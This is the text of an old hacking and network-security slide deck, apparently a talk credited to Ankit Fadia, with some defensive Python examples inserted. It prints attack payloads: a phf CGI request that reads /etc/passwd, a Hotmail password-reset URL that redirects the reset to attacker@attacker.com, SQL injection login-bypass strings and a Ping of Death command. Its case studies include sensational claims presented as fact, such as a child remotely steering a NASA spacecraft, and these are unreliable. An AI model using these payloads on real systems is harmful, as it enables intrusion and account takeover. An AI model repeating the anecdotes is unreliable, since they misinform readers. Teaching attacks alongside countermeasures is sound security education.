HACKED!!! - Rourkela
Network Security

COMPUTER HACKING
Ritu Hooda

How to become a Computer Security Expert? 

THINGS TO DO:
Learn at least one Programming Language.
Become a Networking Guru.
Learn to work in the UNIX Shell.
Get the Hacking attitude.
Read, Read and Read as much as you can!!!!

Hacker VS Cracker 

Qualities of a Hacker: Lots of Knowledge & Experience. Good Guy. Strong Ethics. Never Indulges in Crime. Catches Computer Criminals.

Qualities of a Cracker: Lots of Knowledge & Experience. Bad Guy. Low Ethics. Mostly Indulges in Crime. Is a Computer Criminal himself.

TOP 5 CORPORATE ESPIONAGE ATTACKS
Privacy Attacks
Email Forging Attacks
Sniffer Attacks
Input Validation Attacks
DOS Attacks

Individual Internet User: Mumbai Lady Case
A lady based in Mumbai, India lived in a 1 room apartment.
Was a techno-freak and loved chatting on the Internet.
Attacker broke into her computer & switched her web camera on!
Biggest cyber crime involving privacy invasion in the world!

Government Sector: NASA
The premier space research agency in the world.
Had just finished a successful spaceship launch, when the unexpected happened.
The path of the spaceship was changed remotely by an 11 year old Russian teenager.
Loss of money. Unnecessary Worry.

http://www.hackingmobilephones.com

PRIVACY ON THE INTERNET: IP Addresses
Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network.
An IP Address is a 32-bit address which is divided into four fields of 8 bits each. For Example, 203.94.35.12
All data sent or received by a system will be addressed from or to the system.
An attacker's first step is to find out the IP Address of the target system.
An IP Address is to your computer, what your telephone number is to you!

IP Addresses: Finding an IP Address
A remote IP Address can easily be found out by any of the following methods:
Through Instant Messaging Software
Through Internet Relay Chat
Through Your website
Through Email Headers
Through Message Board Postings

Finding an IP Address via Instant Messengers
INSTANT MESSENGERS
1. Ask your friend to come online and chat with you.
2. Case I: If you are chatting on ICQ, then the following connection exists between your system and your friend's system:
Your System------DIRECT CONNECTION------Friend's System
Friend's System------DIRECT CONNECTION------Your System
Now, goto MSDOS or the command line and type:
C:\>netstat -n
This command will give you the IP Address of your friend's computer.

Finding an IP Address via Instant Messengers
3. Case 2: If you are chatting on other messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend's system:
Your System------Chat Server------Friend's System
Friend's System------Chat Server------Your System
Thus in this case, you first have to establish a direct connection with your friend's computer by either sending him a file or by using the call feature. Then, goto MSDOS or the command line and type:
C:\>netstat -n
This command will give you the IP Address of your friend's computer.

Finding an IP Address via Instant Messengers
Countermeasures
Do not accept File transfers or calls from unknown people.
Chat online ONLY after logging on through a Proxy Server.

Protecting Your IP Address: Proxy Servers
PROXY SERVERS
Definition: A Proxy Server acts as a buffer between you and the Internet, hence it protects your identity.
Working:
Case 1: Your System------Proxy Server------Friend's System
Case 2: Your System------Proxy------Chat Server------Friend's System
Good Proxy Servers: Wingate & WinProxy (For Windows Platform), Squid (For Unix Platforms)

Protecting Your IP Address: Proxy Servers
PROXY BOUNCING
Definition: Proxy Bouncing is the phenomenon wherein you connect to several proxy servers and then connect to the actual destination.
Working: YOUR SYSTEM------PROXY 1------PROXY 2------PROXY 3------PROXY 4------PROXY 5------Destination
Tools: MultiProxy

Finding an IP Address via Internet Relay Chat
INTERNET RELAY CHAT
It is very easy to get the IP Address of your friend through IRC:
1. Ask your friend to chat with you on IRC.
2. Type the following command to get his IP Address:
/whois nicknameofvictim
If this does not work, then one can send a file to the friend and use the netstat command to get his IP Address.

Finding an IP Address via Internet Relay Chat
Countermeasures
One should connect to the IRC server through a proxy.
One should not accept any files or direct chat requests from unknown people.
One can also use the below command to hide one's IP Address:
/mode your_nickname +x
OR
/mode your_nickname +z

Finding an IP Address via your website
WEBSITES
One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code.
Countermeasures
One should surf the Internet through a Proxy Server.
One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com

Finding an IP Address via Email Headers
EMAIL HEADERS
Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.
A Typical excerpt of such a Header of an email sent from a Hotmail account is:

Return-Path: <x@hotmail.com>
Received: from hotmail.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, 23 Jan 2000 05:30:14 PST
X-Originating-IP: [202.xx.109.174]
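To audit what your own outgoing mail discloses, the added example below (not part of the original slides) parses a message's Received chain and X-Originating-IP header and lists the client addresses they expose. The sample message reuses the header excerpt above; its From and Subject lines, its body and all function names are constructed for illustration.

```python
import ipaddress
import re
from email import message_from_string

# Header excerpt from the slide; From/Subject and the body are constructed.
RAW = """\
Return-Path: <x@hotmail.com>
Received: from hotmail.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM)
\tid TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.54.109.174 by www.hotmail.com with HTTP;
\tSun, 23 Jan 2000 05:30:14 PST
X-Originating-IP: [202.xx.109.174]
From: x@hotmail.com
Subject: constructed sample

body
"""

FROM_BY = re.compile(r"from\s+(\S+)\s+by\s+(\S+)", re.IGNORECASE)


def parse(raw):
    """Parse raw RFC 822 text into an email.message.Message."""
    return message_from_string(raw)


def received_hops(msg):
    """Return (from, by) pairs ordered from the sender towards the recipient.

    Each relay prepends its Received header, so header order is newest
    first and has to be reversed to follow the path of the message.
    """
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        match = FROM_BY.search(" ".join(value.split()))  # unfold the header
        if match:
            hops.append((match.group(1), match.group(2)))
    return hops


def is_ip(token):
    """True if token is an IP literal, with or without [brackets]."""
    try:
        ipaddress.ip_address(token.strip("[]"))
        return True
    except ValueError:
        return False


def disclosed_client_addresses(msg):
    """List (header, value) pairs that reveal the submitting client."""
    found = []
    hops = received_hops(msg)
    # A webmail front end that writes "from <IP literal>" in the earliest
    # hop has recorded the browser's address, not a mail server name.
    if hops and is_ip(hops[0][0]):
        found.append(("Received", hops[0][0]))
    for value in msg.get_all("X-Originating-IP", []):
        found.append(("X-Originating-IP", value.strip().strip("[]")))
    return found


if __name__ == "__main__":
    for header, value in disclosed_client_addresses(parse(RAW)):
        print(f"{header}: {value}")
```

Send yourself a test message through a provider and run its raw source through `disclosed_client_addresses` to see whether that provider stamps your address into outgoing mail.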

IP Addresses: Dangers & Concerns
DOS Attacks
Disconnect from the Internet
Trojans Exploitation
Geographical Information
File Sharing Exploits
Invades your Privacy
Spy on You
Steal your Passwords
Slow Your Internet Access Speed.
PRIVACY INVASION IS INDEED A REALITY!

TROJANS
Definition: Trojans act as RATs or Remote Administration Tools that allow remote control and remote access to the attacker.
Working: See Demo.
Threats: Corporate Espionage, Password Stealing, IP Violation, Spying etc.
Tools: Netbus, Girlfriend, Back Orifice and many others.

TROJANS
COUNTERMEASURES
Port Scan your own system regularly. If you find an irregular port open, on which you usually do not have a service running, then your system might have a Trojan installed.
One can remove a Trojan using any normal Anti-Virus Software.
A typical Key Logger automatically loads itself into the memory, each time the computer boots. Hence, one should search all the start up files of the system and remove any references to suspicious programs.
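One way to carry out the first countermeasure without a separate scanner, as an added example that is not part of the original slides: parse `netstat -an` output from your own machine and report every listening port that is not on an allowlist. The sample output and the allowlist are constructed; TCP 12345/12346 and UDP 31337 are the well-known default ports of NetBus and Back Orifice.

```python
import re

# Constructed sample of Windows `netstat -an` output (not from the slides).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49712     203.0.113.7:443        ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:123            *:*
"""

# Services this host is supposed to run (assumption: adjust per machine).
EXPECTED = {("TCP", 135), ("TCP", 445), ("UDP", 123)}

# Default ports of two of the Trojans named on the slide.
KNOWN_TROJAN_PORTS = {
    ("TCP", 12345): "NetBus default",
    ("TCP", 12346): "NetBus default",
    ("UDP", 31337): "Back Orifice default",
}

# proto, local address, local port, foreign address, optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def listening_sockets(netstat_text):
    """Return the set of (proto, port) pairs that accept inbound traffic."""
    found = set()
    for line in netstat_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # banner, column header or blank line
        proto, _local, port, _foreign, state = match.groups()
        # TCP rows count only when LISTENING; UDP rows have no state column.
        if proto == "TCP" and state != "LISTENING":
            continue
        found.add((proto, int(port)))
    return found


def audit(netstat_text, expected=EXPECTED):
    """Return (proto, port, note) for every listener not in `expected`."""
    findings = []
    unexpected = listening_sockets(netstat_text) - set(expected)
    for proto, port in sorted(unexpected):
        note = KNOWN_TROJAN_PORTS.get((proto, port), "unexpected listener")
        findings.append((proto, port, note))
    return findings


if __name__ == "__main__":
    for proto, port, note in audit(SAMPLE_NETSTAT):
        print(f"{proto}/{port}: {note}")
```

An unexpected listener is a lead to investigate, not proof of a Trojan: on Windows, `netstat -ano` adds the owning process ID to check next.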


Consumer Electronic Goods Sector: TV Group
One of the largest manufacturers of televisions and other electronic goods in the world.
Attacker sent an abusive forged email to all investors, employees and partners worldwide from the Chairman's account.
Tainted relations.


Email Forging

Definition: Email Forging is the art of sending an email from the victim's email account without knowing the password.
Working: ATTACKER------Sends Forged email------FROM VICTIM
Tools: None required!
DEMO


Email Forging

COUNTERMEASURES
NOTHING can stop the attacker.
Use Secure email systems like PGP.
Digitally sign your emails.


Healthcare Sector: Healthcare Group
One of the largest shaving solutions companies in the world.
Attacker broke into network and cancelled approximately 35 different orders of raw materials from supplier.
Delay in Product launch. Loss of revenue.

Government Sector: BARC Group
One of the most sensitive atomic and missile research facilities in India.
Pakistani criminal organizations broke into network and stole sensitive missile info.
Loss of sensitive data. Threat to national security.

SNIFFERS
Definition: Sniffers are tools that can capture all data packets being sent across the entire network in the raw form.
Working: ATTACKER------Uses sniffer for spying------VICTIM
Threats: Corporate Espionage, Password Stealing, IP Violation, Spying etc.
Tools: Tcpdump, Ethereal, Dsniff and many more.

SNIFFERS
COUNTERMEASURES
Switch to Switching Networks. (Only the packets meant for that particular host reach the NIC)
Use Encryption Standards like SSL, SSH, IPSec.


Fashion Entertainment Sector: Fashion House Group
One of the most successful fashion designers in Europe.
Stole all designs and marketing plans.
Came out with the same range of clothes a week before.
Loss of Revenue. R&D & Creative work down the drain.

Input Validation Attacks
Users input data into different software on an ongoing basis.
There is usually always some sort of program (software) that accepts the user's input in order to either process it or store it.
However, a problem arises when a program accepts input from the user without validating/verifying it.
Such instances of lazy programming (i.e. programs where the input is NOT validated), can be exploited by attackers for malicious purposes and are called Input Validation Attacks.
Input Validation attacks are more reflective of poor programming practices than smart criminal techniques.

Input Validation Attacks
DANGERS
Most common dangers of such Input Validation attacks are:
Stealing Passwords.
Gaining Access to Sensitive Files.
Remote Execution of malicious commands.
Some of the most atrocious examples of Input Validation attacks are:
Enter 1000 random characters as the password and gain root access.
Enter the path of the password file in the search box of a website and actually get access to it!

Input Validation Attacks
EXAMPLES: Apache Webserver
Apache Webserver (PHF Scripting Language)
http://www.abc.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This can be re-written as:
1. Enter the normal input: /cgi-bin/phf?Qalias=x
2. Goto the next line: %0a
3. Exploit the Input validation vulnerability and execute a malicious command: /bin/cat /etc/passwd

Input Validation Attacks
EXAMPLES: Hotmail
Hotmail Input Validation Attack
https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

Input Validation Attacks
EXAMPLES: MailMachine.cgi
MailMachine is a commonly used CGI script that handles online mailing lists.
Unfortunately, due to poor programming it is open to numerous Input Validation attacks:
Subscribe/Unsubscribe Anyone YOU want.
http://www.abc.com/cgi-bin/mailmachine.cgi?EMAIL

Input Validation Attacks
SQL Injection Attacks
SQL injection attacks are a form of input validation attacks wherein the attacker uses specially crafted SQL queries or commands to carry out malicious activities on the target system.
This vulnerability exists due to a lack of validation of input when a database query is made on the Internet.
The best part about SQL injection attacks like most other input validation attacks is that they can easily be executed with the help of only a browser.

Input Validation Attacks
SQL Injection Attacks: Illegal Access
If a user wants to retrieve all records whose name field is SPORTS:
http://www.domain.com/index.asp?querystring=sports
SELECT * FROM database WHERE querystring='sports'
However, consider the following input:
http://www.domain.com/index.asp?querystring=sports' or 1=1--
SELECT * FROM database WHERE querystring='sports' or 1=1--'
SELECT * FROM database WHERE querystring='sports' or 1=1

Input Validation Attacks
SQL Injection Attacks: Bypassing Security
A number of systems use authentication systems in conjunction with SQL database queries.
For example, if the user enters TOM as the username and TOM123 as the password, then the following query is processed:
SELECT PEOPLE from database WHERE Username='TOM' AND Password='TOM123'
IF <Above SELECT command evaluates to true> {Authorize User} ELSE {User not authorized}

Input Validation Attacks
SQL Injection Attacks: Bypassing Security
However, when an attacker enters TOM' OR 1=1 -- as the username and BLANK as the password, then the following query gets processed:
SELECT PEOPLE from database WHERE Username='TOM' OR 1=1--' AND Password=''
IF <Above SELECT command evaluates to true> {Authorize User} ELSE {User not authorized}
Since -- is used to denote the start of comments, hence the above query becomes:
SELECT PEOPLE from database WHERE Username='TOM' OR 1=1 //ALWAYS TRUE
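The login bypass above, reproduced beside its fix as an added example that is not part of the original slides: the same TOM / TOM123 check written once with string concatenation and once with bound parameters, run against an in-memory SQLite database. The table name `people`, the column names and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build a throwaway in-memory database holding the slide's one user."""
    db = sqlite3.connect(":memory:")
    # Plaintext password only to mirror the slide; real systems store a
    # salted password hash and compare hashes.
    db.execute("CREATE TABLE people (username TEXT, password TEXT)")
    db.execute("INSERT INTO people VALUES ('TOM', 'TOM123')")
    return db


def login_vulnerable(db, username, password):
    """Deliberately vulnerable: user input becomes part of the SQL text."""
    query = (
        "SELECT username FROM people "
        "WHERE username='%s' AND password='%s'" % (username, password)
    )
    # With username "TOM' OR 1=1 --" the statement the database sees is
    #   ... WHERE username='TOM' OR 1=1 --' AND password=''
    # and everything after -- is a comment, so the password test vanishes.
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    """Hardened: placeholders keep input as data, never parsed as SQL."""
    query = "SELECT username FROM people WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


def demo():
    """Run the slide's inputs through both versions and return the results."""
    db = make_db()
    cases = [
        ("TOM", "TOM123"),           # legitimate login
        ("TOM", "wrong"),            # wrong password
        ("TOM' OR 1=1 --", ""),      # input from the slide
    ]
    return [
        (user, login_vulnerable(db, user, pw), login_parameterized(db, user, pw))
        for user, pw in cases
    ]


if __name__ == "__main__":
    for user, vulnerable, hardened in demo():
        print(f"{user!r:20} vulnerable={vulnerable} parameterized={hardened}")
```

The two functions differ only for the third input: the concatenated query authorizes it, the parameterized one looks for a user literally named `TOM' OR 1=1 --` and finds none.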

Input Validation Attacks
COUNTERMEASURES
There are a variety of countermeasures that one must keep in mind to protect against Input Validation attacks:
Restrict User Access and File Access.
Untrusted applications should NOT be allowed to access trusted applications.
Make sure that your software validates input.
Programmers should:
Keep security in mind.
Anticipate & test unexpected input situations.
Adopt a pro-active approach rather than a re-active one.


Denial of Services (DOS) Attacks
DOS ATTACKS
Definition: Such an attack clogs up so much bandwidth on the target system that it cannot serve even legitimate users.
Working: ATTACKER------Infinite/ Malicious Data------VICTIM
Tools: Ping of Death, SYN Flooding, Teardrop, Smurf, Land [TYPES]
Trin00, Tribal Flood Network etc [TOOLS]

Denial of Services (DOS) Attacks: Steps Involved
Steps involved in DOS Attacks
1. Attacker------Infinite/ Malicious Data------Target Network
2. Target Network gets choked or cannot handle the malicious data and hence crashes.
3. As a result, even legitimate clients/ people cannot connect to the target network.
4. This results in loss of revenue, disruption in services, inconvenience, customer dissatisfaction and many other problems.

DOS Attacks: Ping of Death Attack
PING OF DEATH
The maximum packet size allowed to be transmitted by TCP/IP on a network is 65 536 bytes.
In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCP/IP, is sent to the target system.
As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs.
This attack can easily be executed by the ping command as follows:
ping -l 65540 hostname

DOS Attacks: Tear Drop Attack
TEAR DROP ATTACKS
Data sent from the source to the destination system, is broken down into smaller fragments at the source system and then reassembled into larger chunks at the destination system.
For Example, Say data of 4000 bytes is to be sent across a network, then it is broken down into three chunks:
1. CHUNK A contains Bytes 1 to 1500.
2. CHUNK B contains Bytes 1501 to 3000
3. CHUNK C contains Bytes 3001 to 4000
In this example the range of CHUNK A is 1 to 1500, range of CHUNK B is 1501 to 3000 while the range of CHUNK C is 3001 to 4000.

DOS Attacks: Tear Drop Attack Contd.
TEAR DROP ATTACKS
However, in case of a Teardrop attack, these ranges of data chunks are overlapping.
For Example, in case of a Teardrop attack, the same 4000 bytes would be broken down into the below three chunks:
1. CHUNK A contains Bytes 1 to 1500.
2. CHUNK B contains Bytes 1499 to 3000
3. CHUNK C contains Bytes 2999 to 4000
In this example the range of CHUNK A is 1 to 1500, range of CHUNK B is 1499 to 3000 while the range of CHUNK C is 2999 to 4000. Thus, the ranges are overlapping.
Since here the ranges are overlapping, the target system gets DOS'ed!!!
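The check a reassembler needs in order to survive both the Ping of Death and the Teardrop inputs described above, as an added example that is not part of the original slides. It uses the slides' simplified 1-based inclusive byte ranges (real IPv4 carries fragment offsets in 8-byte units counted from 0), takes 65,535 bytes as the limit because the IPv4 total-length field is 16 bits wide, and all function names are constructed for illustration.

```python
MAX_IP_DATAGRAM = 65535  # largest value the 16-bit IPv4 total-length field holds


def check_fragments(fragments, max_total=MAX_IP_DATAGRAM):
    """Validate fragment byte ranges before any reassembly buffer is touched.

    fragments: iterable of (first_byte, last_byte), 1-based and inclusive,
    in any arrival order. Returns a list of (problem, first, last) tuples;
    an empty list means the set is contiguous, non-overlapping and in bounds.
    """
    problems = []
    prev_last = 0  # highest byte covered so far
    for first, last in sorted(fragments):
        if first < 1 or last < first:
            problems.append(("malformed", first, last))
            continue
        if last > max_total:
            # Ping of Death: the reassembled datagram would exceed the
            # protocol maximum and overrun a fixed-size buffer.
            problems.append(("oversize", first, last))
        if first <= prev_last:
            # Teardrop: this fragment re-covers bytes already received.
            problems.append(("overlap", first, last))
        elif first > prev_last + 1:
            # Not an attack by itself: a fragment is still missing.
            problems.append(("gap", first, last))
        prev_last = max(prev_last, last)
    return problems


def safe_to_reassemble(fragments, max_total=MAX_IP_DATAGRAM):
    """True only when every check passes; otherwise drop the whole set."""
    return not check_fragments(fragments, max_total)


# Ranges taken from the two Tear Drop slides.
NORMAL = [(1, 1500), (1501, 3000), (3001, 4000)]
TEARDROP = [(1, 1500), (1499, 3000), (2999, 4000)]
# Constructed: last fragment ends at byte 65540, the size on the ping slide.
OVERSIZE = [(1, 65000), (65001, 65540)]

if __name__ == "__main__":
    for name, frags in (("normal", NORMAL), ("teardrop", TEARDROP),
                        ("oversize", OVERSIZE)):
        print(name, check_fragments(frags) or "ok")
```

Rejecting the whole fragment set on the first problem is what patched TCP/IP stacks do in place of the length arithmetic that crashed vulnerable ones.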

DOS Attacks: SMURF Attacks
SMURF ATTACKS
In SMURF Attacks, a huge number of Ping Requests are sent to the broadcast address of the target network, using Spoofed IP Addresses from within the target network.
Due to infinite loops thus generated and due to the large number of Ping Requests, the target network will crash, restart or hang up.
Countermeasure
Filter out all incoming packets which either:
Has its source address same as any internal system.
Has its target address as the broadcast address.
There is NO reason why external systems need to send data to the broadcast address.

DOS Attacks: Land Attacks
LAND ATTACKS
Some implementations of TCP/IP are vulnerable to packets which originate and terminate from the same IP Address.
Hence, in a LAND attack, the attacker sends infinite packets to the victim system from the victim system itself (Spoofing!).
The same source and target address and port number crashes the victim system.
Countermeasure: Simple filtering should solve the problem.
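The filtering that the SMURF and LAND countermeasures call for, written out as an added example that is not part of the original slides: a decision function for packets arriving on the external interface of a border router. The internal address plan (two subnets from a documentation range), the external sample addresses and the function names are constructed for illustration.

```python
import ipaddress

# Constructed internal address plan: one /24 split into two subnets, so the
# network has two directed-broadcast addresses (.127 and .255), not one.
INTERNAL_NETS = [
    ipaddress.ip_network("192.0.2.0/25"),
    ipaddress.ip_network("192.0.2.128/25"),
]
LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")


def ingress_verdict(src, dst, internal_nets=INTERNAL_NETS):
    """Return (action, reason) for a packet received from the outside."""
    s = ipaddress.ip_address(src)
    d = ipaddress.ip_address(dst)

    # LAND: a packet claiming to come from the host it is addressed to.
    if s == d:
        return ("drop", "LAND: source equals destination")

    # SMURF: external systems have no reason to address a broadcast.
    broadcasts = {net.broadcast_address for net in internal_nets}
    broadcasts.add(LIMITED_BROADCAST)
    if d in broadcasts:
        return ("drop", "SMURF: destination is a broadcast address")

    # Spoofing: an internal source address cannot legitimately arrive on
    # the external interface.
    if any(s in net for net in internal_nets):
        return ("drop", "spoofed: internal source arriving from outside")

    return ("accept", "")


def filter_packets(packets, internal_nets=INTERNAL_NETS):
    """Apply ingress_verdict to (src, dst) pairs; return only accepted ones."""
    return [
        (src, dst)
        for src, dst in packets
        if ingress_verdict(src, dst, internal_nets)[0] == "accept"
    ]


# Constructed sample traffic seen on the external interface.
SAMPLE_PACKETS = [
    ("198.51.100.9", "192.0.2.10"),   # ordinary external client
    ("192.0.2.10", "192.0.2.10"),     # LAND pattern
    ("192.0.2.10", "192.0.2.127"),    # SMURF with spoofed internal source
    ("198.51.100.9", "192.0.2.255"),  # external ping to a broadcast address
    ("192.0.2.130", "192.0.2.10"),    # spoofed internal source
]

if __name__ == "__main__":
    for src, dst in SAMPLE_PACKETS:
        print(src, "->", dst, ingress_verdict(src, dst))
```

On a real router the same three rules are written as access-list entries on the external interface, together with disabling the forwarding of directed broadcasts.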

DOS Attacks: SYN Flooding
SYN Flooding
Normally, each TCP/IP connection is established in the classic 3-way handshake or process:
1. Client------SYN Packet------Host
2. Host------SYN/ACK Packet------Client
3. Client------ACK Packet------Host
SYN Flooding exploits this classic 3-way TCP/IP handshake.
Here, the attacker sends infinite SYN Packets to the victim computer from spoofed IP Addresses. This creates infinite threads in the following half-open state:
Spoofed Address------SYN Packet------Host
Host------SYN/ACK Packet------Spoofed Address

DOS Attacks: SYN Flooding
SYN Flooding
The Spoofed Address used by the attacker, can lead to 3 different scenarios:
The Spoofed IP Address does NOT exist.
The Spoofed IP Address exists.
The Spoofed IP Address is a system within the victim network.

Distributed Denial of Service Attacks (dDOS Attacks)
DOS Attacks VS Distributed DOS Attacks
DOS Attacks: Only ONE Attacker. Not that effective.
Distributed-DOS Attacks: Several attackers. More Effective.

Distributed Denial of Service Attacks (dDOS Attacks)
STEPS INVOLVED IN dDOS ATTACKS
Attacker takes control of a less secure network say X.
Let us assume that there are 100 systems in X's network.
Attacker uses all these 100 systems to attack the actual target T.
Hence, instead of one attacker, there are 100 attackers.

Distributed Denial of Service Attacks (dDOS Attacks)
Tools: Tribal Flood Network (TFN)
Attacker------Clients------Daemons
Allows TCP Floods, SYN Floods or UDP floods on the target system.
Communicates using ICMP, TCP and UDP protocols. Hence difficult to block without affecting regular traffic.
No authorization required to use TFN clients.
TFN2K uses random ports for communication purposes making detection all the more difficult.

Distributed Denial of Service Attacks (dDOS Attacks)
Tools: Trin00
Attacker------Masters------Daemons
Allows UDP floods on the target system.
Allows multiple layered Masters.
All communication takes place on specific UDP and TCP ports.
Trin00 clients are password protected and do not allow illicit usage. However, the password is stored in plaintext in the source code itself.

Distributed Denial of Service Attacks (dDOS Attacks)
Tools: Stacheldraht (Barbed Wire)
Attacker------Masters (Handlers)------Daemons (Agents)
Combines the best features of both TFN and Trin00.
Communicates using the ICMP protocol. Hence, difficult to block without affecting regular traffic.
Uses default TCP ports (16660, 65000) for communication. Can be changed.
All communication is encrypted using single key encryption.

Denial of Services (DOS) Attacks
BUSINESS THREATS
All services unusable.
All users Disconnected.
Loss of revenue.
Deadlines can be missed.
Unnecessary Inefficiency and Downtime.
Share Values go down.
Customer Dissatisfaction.

DOS Attacks
COUNTERMEASURES
Separate or compartmentalize critical services.
Buy more bandwidth than normally required to count for sudden attacks.
Filter out USELESS/MALICIOUS traffic as early as possible.
Disable publicly accessible services.
Balance traffic load on a set of servers.
Regular monitoring and working closely with ISP will always help!
Patch systems regularly.
IPSec provides proper verification and authentication in the IP protocol.
Use scanning tools to detect and remove DOS tools.

Recommendations and Countermeasures
National CERTS and Cyber Cops.
Security EDUCATION and TRAINING.
Increase Security budgets.
Invest on a dedicated security team.
Security by obscurity?

THE FINAL WORD
The biggest threat that an organization faces continues to be from...
THEIR OWN EMPLOYEES!

Is Internet Banking Safer than ATM Machines?
ATM MACHINES VS INTERNET BANKING
ATM Machines: Easier to crack. Soft Powdery Substance. Unencrypted PIN Number. Software/ Hardware Sniffer. Fake ATM Machine.
Internet Banking: Difficult to crack, if latest SSL used. Earlier SSL standards quite weak.

ATM Hacking


Mobile Phone Hacking
Mobile Phone Attacks
Different Types:
BlueJacking
BlueSnarfing
BlueBug Attacks
Failed Authentication Attacks
Malformed OBEX Attack
Malformed SMS Text Message Attack
Malformed MIDI File DOS Attack
Jamming
Viruses and Worms
Secret Codes: *#92702689# or #3370*

Title: An Ethical Hacking Guide to Hacking Mobile Phones
Author: Ankit Fadia
Publisher: Macmillan India Ltd.

Title: The Unofficial Guide To Ethical Hacking
Author: Ankit Fadia
Publisher: Macmillan India Ltd.

Title: Network Security: A Hacker's Perspective
Author: Ankit Fadia
Publisher: Macmillan India Ltd.

Title: The Ethical Hacking Guide to Corporate Security
Author: Ankit Fadia
Publisher: Macmillan India Ltd.

THE ETHICAL HACKING SERIES
Title: Email Hacking
Author: Ankit Fadia
Publisher: Vikas Publications

Title: Windows Hacking
Author: Ankit Fadia
Publisher: Vikas Publications

HACKED!!! - Rourkela
Network Security
Questions?
Ankit Fadia
Intelligence Consultant cum Author
fadia.ankit@gmail.com
